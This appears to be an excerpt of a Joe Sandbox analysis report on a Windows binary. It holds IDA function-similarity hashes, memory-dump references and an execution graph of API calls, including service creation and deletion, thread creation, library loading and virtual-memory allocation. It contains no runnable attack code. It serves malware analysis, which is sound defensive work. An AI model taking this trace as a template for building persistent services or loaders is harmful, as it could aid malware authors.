                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CreateFrameInfo__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2558813199-1018135373
                                      • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                      • Instruction ID: 233d2556b96946bea8ce04f7be8651bb512c3b822ac05bbd6330f3888c45b034
                                      • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                      • Instruction Fuzzy Hash: D5512CB6619A4196E620EF16A44027DB7B4FB89FA0F1405B6EB8D07B65DF38E461CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID: U
                                      • API String ID: 442123175-4171548499
                                      • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                      • Instruction ID: 4899d5b69e499150c1b91b61ecd0a0c39b1d9a911e2d5be17ad40c1d5536b082
                                      • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                      • Instruction Fuzzy Hash: FC41B6A2B19A4181DB20DF26E4453B96760FB88BA5F444072DE8E877A4EF3CD551C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID: csm
                                      • API String ID: 3997070919-1018135373
                                      • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                      • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                      • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                      • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                      APIs
                                        • Part of subcall function 00007FFE1A453A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A453A63
                                      • __GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A460993
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CheckCommonHandler__except_validate_context_record
                                      • String ID: csm$f
                                      • API String ID: 1543384424-629598281
                                      • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                      • Instruction ID: dd2242ddc46dae5fdb3336c24e168584294105fa552d30b7f15c2c461c2ec3ab
                                      • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                      • Instruction Fuzzy Hash: 9711B472B14B8585E714AF23A4411B97774EB85FE4F0880B6EE8C07B66CE38E861CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: TimerWaitable
                                      • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                      • API String ID: 1823812067-484248852
                                      • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                      • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                      • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                      • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                      APIs
                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A45112F), ref: 00007FFE1A4539E0
                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A45112F), ref: 00007FFE1A453A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFileHeaderRaise
                                      • String ID: csm
                                      • API String ID: 2573137834-1018135373
                                      • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                      • Instruction ID: f8fcaa41c94f2537ef52b1a0042677dccdec42792ea57672e710798bf15c0157
                                      • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                      • Instruction Fuzzy Hash: 05111972A18F8182EB218B16E45026977E5FB88F94F5842B1EE8D07B68DF3CD5618B00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: TimerWaitable
                                      • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                      • API String ID: 1823812067-3336177065
                                      • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                      • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                      • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                      • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                      • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                      • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                      • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                      Execution Graph

                                      Execution Coverage:2.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:462
                                      Total number of Limit Nodes:7
                                      execution_graph 13939 140005df3 13940 140005e71 13939->13940 13941 140005e84 CreateFileA 13940->13941 13942 140005f50 _SetImageBase 13941->13942 13943 140005fc3 malloc ReadFile 13942->13943 16579 7ffe1a4c11b0 16584 7ffe1a4c1209 16579->16584 16580 7ffe1a4c1b70 BuildCatchObjectHelperInternal 8 API calls 16583 7ffe1a4c14d3 16580->16583 16581 7ffe1a4c1b90 51 API calls 16597 7ffe1a4c1300 BuildCatchObjectHelperInternal 16581->16597 16582 7ffe1a4c14f0 16612 7ffe1a4c1a40 16582->16612 16584->16582 16586 7ffe1a4c12c7 16584->16586 16587 7ffe1a4c129e 16584->16587 16590 7ffe1a4c12b9 BuildCatchObjectHelperInternal 16584->16590 16584->16597 16588 7ffe1a4c1b90 51 API calls 16586->16588 16589 7ffe1a4c14f6 16587->16589 16598 7ffe1a4c1b90 16587->16598 16588->16590 16615 7ffe1a4c1110 16589->16615 16590->16581 16595 7ffe1a4c14eb 16607 7ffe1a4c79cc 16595->16607 16597->16580 16599 7ffe1a4c1b9b 16598->16599 16600 7ffe1a4c12b0 16599->16600 16601 7ffe1a4c7a4c _invalid_parameter_noinfo 2 API calls 16599->16601 16602 7ffe1a4c1bba 16599->16602 16600->16590 16600->16595 16601->16599 16603 7ffe1a4c1bc5 16602->16603 16621 7ffe1a4c21f0 16602->16621 16605 7ffe1a4c1110 Concurrency::cancel_current_task 51 API calls 16603->16605 16606 7ffe1a4c1bcb 16605->16606 16608 7ffe1a4c7844 _invalid_parameter_noinfo 47 API calls 16607->16608 16609 7ffe1a4c79e5 16608->16609 16610 7ffe1a4c79fc _invalid_parameter_noinfo_noreturn 17 API calls 16609->16610 16611 7ffe1a4c79fa 16610->16611 16625 7ffe1a4c1b34 16612->16625 16616 7ffe1a4c111e Concurrency::cancel_current_task 16615->16616 16617 7ffe1a4c3990 Concurrency::cancel_current_task 2 API calls 16616->16617 16618 7ffe1a4c112f 16617->16618 16619 7ffe1a4c379c __std_exception_copy 49 API calls 16618->16619 16620 7ffe1a4c1159 16619->16620 16622 7ffe1a4c21fe Concurrency::cancel_current_task 16621->16622 16623 7ffe1a4c3990 Concurrency::cancel_current_task 2 API calls 16622->16623 16624 7ffe1a4c220f 16623->16624 16630 7ffe1a4c1ab0 16625->16630 16628 7ffe1a4c3990 Concurrency::cancel_current_task 2 API calls 16629 7ffe1a4c1b56 16628->16629 16631 7ffe1a4c379c __std_exception_copy 49 API calls 16630->16631 16632 7ffe1a4c1ae4 16631->16632 16632->16628 15119 140007412 15121 140007333 15119->15121 15120 1400073e0 LdrLoadDll 15120->15121 15121->15120 15122 140007403 15121->15122 15527 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15530 1400054e0 15527->15530 15529 1400136ef 15531 14000552c 15530->15531 15534 140005506 sprintf_s 15530->15534 15532 1400074d0 LdrLoadDll 15531->15532 15533 140005536 15532->15533 15535 140008370 3 API calls 15533->15535 15534->15529 15539 140005545 _SetImageBase 15535->15539 15536 1400055b8 15537 140008de0 _lock 2 API calls 15536->15537 15538 1400055c0 sprintf_s 15537->15538 15538->15534 15539->15536 15540 1400074f0 LdrLoadDll 15539->15540 15541 140005561 CreateThread 15540->15541 15541->15538 15542 1400055b0 GetLastError 15541->15542 15542->15536 13948 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13949 140005ab1 13948->13949 13950 140005add GetVersionExA 13948->13950 13951 140005abf 13949->13951 13998 140009540 13949->13998 13952 140005b0e GetProcessHeap HeapFree 13950->13952 13953 140005af0 GetProcessHeap HeapFree 13950->13953 14006 140009300 13951->14006 13958 140005b3c 13952->13958 13954 140005d0b 13953->13954 13957 140005ac9 14017 140008510 GetModuleHandleA 13957->14017 14021 14000a310 HeapCreate 13958->14021 13961 140005bec 13962 140005c12 13961->13962 13963 140005bf0 13961->13963 13967 140005c17 13962->13967 13964 140005bfe 13963->13964 13965 140009540 _lock 12 API calls 13963->13965 13966 140009300 _lock 10 API calls 13964->13966 13965->13964 13968 140005c08 13966->13968 13969 140005c3d 13967->13969 13971 140005c29 13967->13971 13972 140009540 _lock 12 API calls 13967->13972 13970 140008510 _lock 3 API calls 13968->13970 14024 140009f50 GetStartupInfoA 13969->14024 13970->13962 13973 140009300 _lock 10 API calls 13971->13973 13972->13971 13975 140005c33 13973->13975 13977 140008510 _lock 3 API calls 13975->13977 13977->13969 13978 140005c56 14044 140009e30 13978->14044 13981 140005c5b 14062 140009c30 13981->14062 13985 140005c73 13986 140005c81 13985->13986 13988 1400084e0 _lock 12 API calls 13985->13988 14092 140009690 13986->14092 13988->13986 13989 140005c86 13990 140005c94 13989->13990 13991 1400084e0 _lock 12 API calls 13989->13991 14104 140008650 13990->14104 13991->13990 13993 140005c9e 13994 1400084e0 _lock 12 API calls 13993->13994 13995 140005ca9 13993->13995 13994->13995 14108 140001520 13995->14108 13997 140005ad3 13997->13954 13999 14000954e _lock 13998->13999 14000 14000959c 13999->14000 14001 14000961c 13999->14001 14003 1400095c9 GetStdHandle 13999->14003 14002 140009300 _lock 10 API calls 14000->14002 14001->13951 14002->14001 14003->14000 14004 1400095dc 14003->14004 14004->14000 14005 1400095e2 WriteFile 14004->14005 14005->14000 14009 140009320 _lock 14006->14009 14007 140009330 14007->13957 14008 1400094dc GetStdHandle 14008->14007 14010 1400094ef 14008->14010 14009->14007 14009->14008 14012 140009375 _lock 14009->14012 14010->14007 14011 1400094f5 WriteFile 14010->14011 14011->14007 14012->14007 14013 1400093b9 GetModuleFileNameA 14012->14013 14014 1400093d9 _lock 14013->14014 14126 14000f000 14014->14126 14018 140008543 ExitProcess 14017->14018 14019 14000852a GetProcAddress 14017->14019 14019->14018 14020 14000853f 14019->14020 14020->14018 14022 14000a334 14021->14022 14023 14000a339 HeapSetInformation 14021->14023 14022->13961 14023->13961 14152 140008370 14024->14152 14026 140005c48 14026->13978 14037 1400084e0 14026->14037 14027 14000a1c4 GetStdHandle 14034 14000a17c 14027->14034 14028 140008370 3 API calls 14031 140009f8a 14028->14031 14029 14000a239 SetHandleCount 14029->14026 14030 14000a1d8 GetFileType 14030->14034 14031->14026 14031->14028 14032 14000a0e3 14031->14032 14031->14034 14032->14026 14033 14000a11c GetFileType 14032->14033 14032->14034 14157 14000edc0 14032->14157 14033->14032 14034->14026 14034->14027 14034->14029 14034->14030 14036 14000edc0 _lock 3 API calls 14034->14036 14036->14034 14038 140009540 _lock 12 API calls 14037->14038 14039 1400084ed 14038->14039 14040 140009300 _lock 10 API calls 14039->14040 14041 1400084f4 14040->14041 14042 1400073e0 _lock LdrLoadDll 14041->14042 14043 140008500 14042->14043 14045 140009e7c 14044->14045 14046 140009e3e GetCommandLineW 14044->14046 14049 140009e81 GetCommandLineW 14045->14049 14051 140009e69 14045->14051 14047 140009e49 GetCommandLineW 14046->14047 14048 140009e5e GetLastError 14046->14048 14047->14048 14050 140009e75 14048->14050 14048->14051 14049->14051 14050->13981 14051->14050 14052 140009e91 GetCommandLineA MultiByteToWideChar 14051->14052 14053 140009ec8 14052->14053 14054 140009ed9 14052->14054 14053->13981 14055 140008370 3 API calls 14054->14055 14056 140009eeb 14055->14056 14057 140009f32 14056->14057 14058 140009ef3 MultiByteToWideChar 14056->14058 14057->13981 14059 140009f13 14058->14059 14060 140009f2a 14058->14060 14059->13981 14171 140008de0 14060->14171 14063 140009c52 GetEnvironmentStringsW 14062->14063 14067 140009c86 14062->14067 14064 140009c6c GetLastError 14063->14064 14072 140009c60 14063->14072 14066 140009c77 14064->14066 14064->14067 14065 140009c91 GetEnvironmentStringsW 14069 140005c67 14065->14069 14065->14072 14068 140009d09 GetEnvironmentStrings 14066->14068 14066->14069 14067->14065 14067->14066 14068->14069 14070 140009d17 14068->14070 14088 1400099c0 GetModuleFileNameW 14069->14088 14071 140009d58 14070->14071 14075 140009d20 MultiByteToWideChar 14070->14075 14076 140008370 3 API calls 14071->14076 14176 140008300 14072->14176 14075->14069 14075->14070 14079 140009d68 14076->14079 14077 140009ce1 __SehTransFilter 14083 140009cef FreeEnvironmentStringsW 14077->14083 14078 140009cd1 FreeEnvironmentStringsW 14078->14069 14080 140009d7d 14079->14080 14081 140009d70 FreeEnvironmentStringsA 14079->14081 14082 140009de5 FreeEnvironmentStringsA 14080->14082 14084 140009d90 MultiByteToWideChar 14080->14084 14081->14069 14082->14069 14083->14069 14084->14080 14085 140009e0e 14084->14085 14086 140008de0 _lock 2 API calls 14085->14086 14087 140009e16 FreeEnvironmentStringsA 14086->14087 14087->14069 14089 140009a03 14088->14089 14090 140008300 _lock 17 API calls 14089->14090 14091 140009bca 14089->14091 14090->14091 14091->13985 14093 1400096b2 14092->14093 14094 1400096a8 14092->14094 14095 140008370 3 API calls 14093->14095 14094->13989 14096 1400096fa 14095->14096 14097 140009709 14096->14097 14098 1400097a5 14096->14098 14100 140008370 3 API calls 14096->14100 14101 1400097e5 14096->14101 14097->13989 14099 140008de0 _lock 2 API calls 14098->14099 14103 1400097b4 14099->14103 14100->14096 14102 140008de0 _lock 2 API calls 14101->14102 14102->14103 14103->13989 14106 140008666 14104->14106 14107 1400086bf 14106->14107 14192 140005380 14106->14192 14107->13993 14109 140001565 14108->14109 14110 140001569 14109->14110 14111 14000157e 14109->14111 14230 140001430 GetModuleFileNameW OpenSCManagerW 14110->14230 14114 140001595 OpenSCManagerW 14111->14114 14115 14000164f 14111->14115 14118 1400015b2 GetLastError 14114->14118 14119 1400015cf OpenServiceW 14114->14119 14116 140001654 14115->14116 14117 140001669 StartServiceCtrlDispatcherW 14115->14117 14239 1400011f0 14116->14239 14117->13997 14118->13997 14121 140001611 DeleteService 14119->14121 14122 1400015e9 GetLastError CloseServiceHandle 14119->14122 14123 140001626 CloseServiceHandle CloseServiceHandle 14121->14123 14124 14000161e GetLastError 14121->14124 14122->13997 14123->13997 14124->14123 14127 14000f01e _lock 14126->14127 14128 14000f03b LoadLibraryA 14127->14128 14129 14000f125 _lock 14127->14129 14130 14000f054 GetProcAddress 14128->14130 14131 1400094c9 14128->14131 14144 14000f165 14129->14144 14149 1400073e0 LdrLoadDll 14129->14149 14130->14131 14132 14000f06d _lock 14130->14132 14131->13957 14136 14000f075 GetProcAddress 14132->14136 14134 1400073e0 _lock LdrLoadDll 14134->14131 14135 1400073e0 _lock LdrLoadDll 14141 14000f1e9 14135->14141 14138 140007220 _lock 14136->14138 14140 14000f094 GetProcAddress 14138->14140 14139 1400073e0 _lock LdrLoadDll 14139->14144 14143 14000f0b3 _lock 14140->14143 14142 1400073e0 _lock LdrLoadDll 14141->14142 14145 14000f1a3 _lock 14141->14145 14142->14145 14143->14129 14146 14000f0e9 GetProcAddress 14143->14146 14144->14135 14144->14145 14145->14134 14147 14000f101 _lock 14146->14147 14147->14129 14148 14000f10d GetProcAddress 14147->14148 14148->14129 14150 140007333 14149->14150 14150->14149 14151 140007403 14150->14151 14151->14139 14153 1400083a0 14152->14153 14155 1400083e0 14153->14155 14156 1400083be Sleep 14153->14156 14163 14000e850 14153->14163 14155->14031 14156->14153 14156->14155 14158 1400073e0 _lock LdrLoadDll 14157->14158 14160 14000edec _lock 14158->14160 14159 14000ee1d _lock 14159->14032 14160->14159 14161 14000ee26 GetModuleHandleA 14160->14161 14161->14159 14162 14000ee38 GetProcAddress 14161->14162 14162->14159 14164 14000e865 14163->14164 14165 14000e8be HeapAlloc 14164->14165 14167 14000e876 sprintf_s 14164->14167 14168 1400090b0 14164->14168 14165->14164 14165->14167 14167->14153 14169 1400073e0 _lock LdrLoadDll 14168->14169 14170 1400090c5 14169->14170 14170->14164 14172 140008de9 HeapFree 14171->14172 14173 140008e19 _lock 14171->14173 14172->14173 14174 140008dff sprintf_s 14172->14174 14173->14057 14175 140008e09 GetLastError 14174->14175 14175->14173 14177 140008320 14176->14177 14179 140008338 Sleep 14177->14179 14180 140008358 14177->14180 14181 1400090f0 14177->14181 14179->14177 14179->14180 14180->14077 14180->14078 14182 14000919e 14181->14182 14189 140009103 14181->14189 14183 1400090b0 _lock LdrLoadDll 14182->14183 14185 1400091a3 sprintf_s 14183->14185 14184 14000914c HeapAlloc 14184->14189 14190 140009173 sprintf_s 14184->14190 14185->14177 14186 140009540 _lock 12 API calls 14186->14189 14187 140009300 _lock 10 API calls 14187->14189 14188 1400090b0 _lock LdrLoadDll 14188->14189 14189->14184 14189->14186 14189->14187 14189->14188 14189->14190 14191 140008510 _lock 3 API calls 14189->14191 14190->14177 14191->14189 14195 140005250 14192->14195 14194 140005389 14194->14107 14196 140005271 14195->14196 14197 1400073e0 _lock LdrLoadDll 14196->14197 14198 14000527e 14197->14198 14199 1400073e0 _lock LdrLoadDll 14198->14199 14200 14000528d 14199->14200 14206 1400052f0 _lock 14200->14206 14207 140008490 14200->14207 14202 1400052b5 14203 1400052d9 14202->14203 14202->14206 14210 140008400 14202->14210 14205 140008400 7 API calls 14203->14205 14203->14206 14205->14206 14206->14194 14208 1400084c5 HeapSize 14207->14208 14209 140008499 sprintf_s 14207->14209 14209->14202 14212 140008430 14210->14212 14213 140008472 14212->14213 14214 140008450 Sleep 14212->14214 14215 14000e920 14212->14215 14213->14203 14214->14212 14214->14213 14216 14000e935 14215->14216 14217 14000e94c 14216->14217 14227 14000e95e 14216->14227 14218 140008de0 _lock 2 API calls 14217->14218 14221 14000e951 14218->14221 14219 14000e9b1 14220 1400090b0 _lock LdrLoadDll 14219->14220 14223 14000e9b9 _lock sprintf_s 14220->14223 14221->14212 14222 14000e973 HeapReAlloc 14222->14223 14222->14227 14223->14212 14224 14000e9f4 sprintf_s 14226 14000e9f9 GetLastError 14224->14226 14225 1400090b0 _lock LdrLoadDll 14225->14227 14226->14223 14227->14219 14227->14222 14227->14224 14227->14225 14228 14000e9db sprintf_s 14227->14228 14229 14000e9e0 GetLastError 14228->14229 14229->14223 14231 140001482 CreateServiceW 14230->14231 14232 14000147a GetLastError 14230->14232 14234 1400014ea GetLastError 14231->14234 14235 1400014df CloseServiceHandle 14231->14235 14233 1400014fd 14232->14233 14245 140004f30 14233->14245 14237 1400014f2 CloseServiceHandle 14234->14237 14235->14237 14237->14233 14238 14000150d 14238->13997 14240 1400011fa 14239->14240 14254 1400051d0 14240->14254 14243 140004f30 sprintf_s NtAllocateVirtualMemory 14244 140001262 14243->14244 14244->13997 14247 140004f39 _SetImageBase 14245->14247 14246 140004f44 14246->14238 14247->14246 14250 140006c95 14247->14250 14249 14000660e sprintf_s 14249->14238 14252 140006d7b 14250->14252 14253 140006d9d 14250->14253 14251 140006f95 NtAllocateVirtualMemory 14251->14253 14252->14251 14252->14253 14253->14249 14257 140008270 14254->14257 14256 140001238 MessageBoxW 14256->14243 14258 14000827e 14257->14258 14260 1400082ac sprintf_s 14257->14260 14258->14260 14261 140008120 14258->14261 14260->14256 14262 14000816a 14261->14262 14266 14000813b sprintf_s 14261->14266 14264 1400081d7 14262->14264 14262->14266 14267 140007f50 14262->14267 14265 140007f50 sprintf_s 54 API calls 14264->14265 14264->14266 14265->14266 14266->14260 14276 140007f69 sprintf_s 14267->14276 14268 140007f74 sprintf_s 14268->14264 14269 14000801d 14270 1400080d5 14269->14270 14271 14000802f 14269->14271 14272 14000cc00 sprintf_s 54 API calls 14270->14272 14273 14000804c 14271->14273 14275 140008081 14271->14275 14277 140008056 14272->14277 14283 14000cc00 14273->14283 14275->14277 14291 14000c2a0 14275->14291 14276->14268 14276->14269 14280 14000cd50 14276->14280 14277->14264 14281 140008300 _lock 17 API calls 14280->14281 14282 14000cd6a 14281->14282 14282->14269 14284 14000cc3f 14283->14284 14290 14000cc23 sprintf_s 14283->14290 14284->14290 14299 14000fc50 14284->14299 14288 14000ccc5 sprintf_s 14344 14000fd20 LeaveCriticalSection 14288->14344 14290->14277 14292 14000c2e0 14291->14292 14295 14000c2c3 sprintf_s 14291->14295 14293 14000fc50 sprintf_s 25 API calls 14292->14293 14292->14295 14294 14000c34e 14293->14294 14296 14000c1f0 sprintf_s 2 API calls 14294->14296 14297 14000c367 sprintf_s 14294->14297 14295->14277 14296->14297 14378 14000fd20 LeaveCriticalSection 14297->14378 14300 14000fc96 14299->14300 14301 14000fccb 14299->14301 14345 14000b400 14300->14345 14302 14000ccac 14301->14302 14303 14000fccf EnterCriticalSection 14301->14303 14302->14288 14309 14000c3f0 14302->14309 14303->14302 14311 14000c42e 14309->14311 14328 14000c427 sprintf_s 14309->14328 14310 140004f30 sprintf_s NtAllocateVirtualMemory 14312 14000cbe6 14310->14312 14315 14000c4fb _SetImageBase sprintf_s 14311->14315 14311->14328 14372 14000c1f0 14311->14372 14312->14288 14314 14000c841 14316 14000c86a 14314->14316 14317 14000cb20 WriteFile 14314->14317 14315->14314 14318 14000c526 GetConsoleMode 14315->14318 14320 14000c936 14316->14320 14324 14000c876 14316->14324 14319 14000cb53 GetLastError 14317->14319 14317->14328 14318->14314 14321 14000c557 14318->14321 14319->14328 14326 14000c940 14320->14326 14334 14000ca02 14320->14334 14321->14314 14322 14000c564 GetConsoleCP 14321->14322 14322->14328 14338 14000c581 sprintf_s 14322->14338 14323 14000c8c5 WriteFile 14323->14324 14325 14000c928 GetLastError 14323->14325 14324->14323 14324->14328 14325->14328 14326->14328 14329 14000c991 WriteFile 14326->14329 14327 14000ca57 WideCharToMultiByte 14330 14000cb15 GetLastError 14327->14330 14327->14334 14328->14310 14329->14326 14331 14000c9f4 GetLastError 14329->14331 14330->14328 14331->14328 14332 14000cab0 WriteFile 14333 14000caf6 GetLastError 14332->14333 14332->14334 14333->14328 14333->14334 14334->14327 14334->14328 14334->14332 14335 14000c649 WideCharToMultiByte 14335->14328 14336 14000c68c WriteFile 14335->14336 14336->14338 14339 14000c80d GetLastError 14336->14339 14337 14000c829 GetLastError 14337->14328 14338->14328 14338->14335 14338->14337 14340 14000fd50 7 API calls sprintf_s 14338->14340 14341 14000c6e2 WriteFile 14338->14341 14343 14000c81b GetLastError 14338->14343 14339->14328 14340->14338 14341->14338 14342 14000c7ff GetLastError 14341->14342 14342->14328 14343->14328 14346 14000b41e 14345->14346 14347 14000b42f EnterCriticalSection 14345->14347 14351 14000b2f0 14346->14351 14349 14000b423 14349->14347 14350 1400084e0 _lock 12 API calls 14349->14350 14350->14347 14352 14000b317 14351->14352 14354 14000b32e 14351->14354 14353 140009540 _lock 12 API calls 14352->14353 14355 14000b31c 14353->14355 14356 140008300 _lock 17 API calls 14354->14356 14360 14000b342 sprintf_s 14354->14360 14357 140009300 _lock 10 API calls 14355->14357 14358 14000b350 14356->14358 14359 14000b324 14357->14359 14358->14360 14361 14000b400 _lock 22 API calls 14358->14361 14362 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14359->14362 14360->14349 14363 14000b371 14361->14363 14362->14354 14364 14000b3a7 14363->14364 14365 14000b379 14363->14365 14367 140008de0 _lock HeapFree GetLastError 14364->14367 14366 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14365->14366 14368 14000b386 14366->14368 14371 14000b392 sprintf_s 14367->14371 14370 140008de0 _lock HeapFree GetLastError 14368->14370 14368->14371 14369 14000b3b0 LeaveCriticalSection 14369->14360 